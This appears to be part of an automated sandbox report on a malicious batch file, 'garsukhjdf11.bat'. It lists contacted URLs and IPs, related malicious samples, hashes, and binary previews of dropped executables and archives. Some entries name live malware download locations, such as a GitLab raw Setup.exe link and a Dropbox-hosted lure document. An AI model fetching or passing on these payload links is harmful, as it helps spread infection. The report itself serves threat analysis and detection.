                                                                                                                                                        https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://gitlab.com/-/sandbox/powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://gitlab.com/admin/powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://customers.gitlab.compowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://sourcegraph.compowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2154119672.0000028C0E631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70CC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.000002230005B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.0000022300023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://dl-web.dropbox.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://app.hellofax.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://cfl.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.paypal.com/sdk/jspowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docpowershell.exe, 0000000C.00000002.2154119672.0000028C0FFF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            172.65.251.78
                                                                                                                                                                                            gitlab.comUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            162.125.69.18
                                                                                                                                                                                            www-env.dropbox-dns.comUnited States
                                                                                                                                                                                            19679DROPBOXUSfalse
                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1573653
                                                                                                                                                                                            Start date and time:2024-12-12 12:58:11 +01:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 6m 22s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:18
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Sample name:garsukhjdf11.bat
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal92.troj.evad.winBAT@28/61@3/2
                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                            • Number of executed functions: 30
                                                                                                                                                                                            • Number of non-executed functions: 1
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Found application associated with file extension: .bat
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 5616 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 5972 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6164 because it is empty
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • VT rate limit hit for: garsukhjdf11.bat
                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            06:59:09API Interceptor98x Sleep call for process: powershell.exe modified
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                                            162.125.69.18https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              [EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                  l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                    Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                        zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                            kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                gitlab.comUpdates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                II.f_Campaign Information for Partners(27Nov).docx.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hnskldjf230.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjsdhfjk30De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                www-env.dropbox-dns.com[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                CLOUDFLARENETUS33abb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                56ff7c.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                https://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                57ff67.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                http://productfocus.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.26.0.186
                                                                                                                                                                                                                427c7bdc-ea02-97de-e5ef-a2c58c2d0a48.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                setup (2).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.18.86.42
                                                                                                                                                                                                                https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.20.3.69
                                                                                                                                                                                                                DROPBOXUShttps://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                [EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.1.20
                                                                                                                                                                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.40.3
                                                                                                                                                                                                                751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0enbavdfasfGarminde.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                https://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                RQ--029.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                3d#U0438.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                Agreement for Cooperation.PDF.lnk.download.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                RFQ-004282A.Teknolojileri A.S.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                Strait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):68976560
                                                                                                                                                                                                                Entropy (8bit):7.994091835839617
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1572864:p20cEa6WWQ/PI5c9v4bTNyrOOBNzJTCW15s37:EIa6Ih6vUlBNzJTCi5I7
                                                                                                                                                                                                                MD5:7CB3BDEE3DDE5CB040A974BD4F5CE108
                                                                                                                                                                                                                SHA1:88777382C447994E610DE914E510BDC131D2E24F
                                                                                                                                                                                                                SHA-256:370D38E5279E35DF64A13E4EB9AC954BD58520BF2AAD83AE47072FC4D20AB0E9
                                                                                                                                                                                                                SHA-512:3CC5EC73A41BB9034F988CCB945667C0A200B447A14030CE2219DA279CF71368B1270673B24805CB95849EE4607328792A4EB50748F6BA72D6DD6D25352B8B9A
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:PK........q.KY................Scripts/PK.........=VX0p(Kt...........Scripts/normalizer.exe..`.U.0.dk.'..e.....,..5..M...R6......B;....lM;...EG.g.Q.e..q.aS......T,.R...,.m.....{.......}..~o...}..s.=....p.....p...~,...:..g..>...G.P9..X.|E....pYq.JSN..U..ii....b..6g.iean....x.....V...>.._.'G...R..k.|a...n.}...S...9...A....3.[...Y..]...v...u...9.4.....h......c F..cf5.....AM.......@.......}1I.MC.....|..U.%*$..S..H........W..$....8.....C...qY..s..l....4......t...$...YY...LT=.UM*..-Q..\4..W..L*.)...........py...p..f.......fp.....hp.tJ.9<....t.l.PvZ.s. .^JVqB.^.S....Ni..lW.7-...^g|......9N....k.7..%x.-.*N.c9n'..b..-.5.46^%O-.39$O.O...=.......*.9.h0.,O..8^/x.x.".}.$...&H...\.I.......nrH....0.z..J.&.$...r.......m...M.$..R. -...{Mw.t..'x...Z.X.Zo.......)..^.X($.5i>...{..NO^.\.s.Uj....h..?^-7u*. A...:..l....."_.A..V.w.%.V.Xy.=.J.P.6.....vkU.....M...C.9....$.ERo.....`...c4.?!Gq$^.4.}..8.-@.Z..J_./d...b..o....q4_.T.>.v._....a.k!7.....(.9.Sj..O
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 27142-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 38685626227668133590597632.000000
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):31046
                                                                                                                                                                                                                Entropy (8bit):5.265533758595518
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:A9gdk/PPz7bbK4UJ5O88oUExBs0yE3dRvJo9z35X2e5ncMh3y9ouCJ:ddknPK5B8odzn6z3V5ncMhC9od
                                                                                                                                                                                                                MD5:867A653DB3E8155B9B102CAF3789EB9C
                                                                                                                                                                                                                SHA1:6B72AE366B386FE1482712C92EAFA71D27ABB0B9
                                                                                                                                                                                                                SHA-256:4A0ACF1B9165DC1F0BB2658539747396D5C78DA55A0230B1446C4E2D8581CBCE
                                                                                                                                                                                                                SHA-512:30BE1B012DFC56AA85BED49262F09DBE8EB673133AC8FF415473F9E679B7CA9C308413FF956C718D5A38303B1A0F8EFDB93EBCDB4377069F432F5B97609A7452
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.........l.ewj........................h.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.Z...e.e.j...................j.....................e.j...........................d.........d.........Z...G.d...d.........Z.e.j.....................e.j...................e._...........e.e.j...........................e._...........e.e.j...........................e._.........g.d...Z.d.Z.d.Z.d.e.j$..................z...Z...e...d.Z...e...d...Z.d...Z.d...Z.d d...Z.d!d...Z.d"d...Z d"d...Z!d...Z"d...Z#d...Z$d...Z%d...Z&d...Z'd...Z(e)d.k(..r...e(..........y.y.#...d.d.l.Z.Y...x.Y.w.#.e.$.r...d.Z.d...Z.d...Z.d...Z.Y..\w.x.Y.w.#.e.$.r.....d.d...Z.d...Z.Y..lw.x.Y.w.)#.....Nz.pywin32_postinstall.log..wc...........................e.Z.d.Z.d...Z.d...Z.d...Z.y.)...Teec...........................|.|._.........y...N)...f)...self..files.... .uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\../../Scripts/pywin32_postinstall.py..__init__z.Tee.__init__....s..................c...
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4638
                                                                                                                                                                                                                Entropy (8bit):5.317675397318066
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:ZwodWonjw4uFdJnd55vNEWTYEr9uP9cbx3:Zw2OFPnd5NTYEuPil
                                                                                                                                                                                                                MD5:41671BA459D142D40397F832DE16EA77
                                                                                                                                                                                                                SHA1:562D054EEAB225426E4E0CCE91627894CB8CFCDA
                                                                                                                                                                                                                SHA-256:8170E7724D36B3685885E8961958EEDD62F2E8EF1A3A398EBCDA1E05E11B2F70
                                                                                                                                                                                                                SHA-512:EB97DE481DB33E8C2E5EFB2374F28C7CB6F1FA6F9C1E7550ECDB12A483D9828FB5FE61DD4D59C757A68406F8890FA606746CA1228023F663BE801EBE1CDC72B7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.........l.e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...................j...................e.........Z...e.j...........................g...e.j...........................z...Z.g.Z.d...Z.d...Z.d...Z.e.d.k(..r...e...........y.y.).z.A test runner for pywin32.....Nc..........................t.........j...................j...................|.........\...}.}.t.........j...................d.|.g.|.z...}.t.........d.|.z.............t.........j...................j.............................t.........j...................|.d.|...........}.t.........d.|...d.|.j.................................t.........j...................j.............................|.j...................r.t.........j...................|...........y.y.).Nz.-uz.--- Running '%s' ---F)...check..cwdz.*** Test script 'z.' exited with )...os..path..split..sys..executable..print..stdout..flush..subprocess..run..returncode..failures..append)...script..cmdline_extras..dirname..scriptname..cmd..results....
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):108444
                                                                                                                                                                                                                Entropy (8bit):6.092160600743894
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Gtu:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Au
                                                                                                                                                                                                                MD5:E81D6B92F76B08EAB808FF59ACA13F33
                                                                                                                                                                                                                SHA1:B588B48F292090E46277D924661F7ABDF4C63BCA
                                                                                                                                                                                                                SHA-256:507498BC73E06611171AB5C765ACE6C8976C8025829EA31F332AB5A89B7CCED6
                                                                                                                                                                                                                SHA-512:2F14682928D5141809AEF831E4CDCAF63E9A481EB6E8F94898DEABF17C0B23B8F936264692766E24C1EE06C428F157B070C45232BB5261DC19EBFD36A9A4B715
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):108432
                                                                                                                                                                                                                Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):108432
                                                                                                                                                                                                                Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                MD5:765951BB101AC5B187537DA554BF99EB
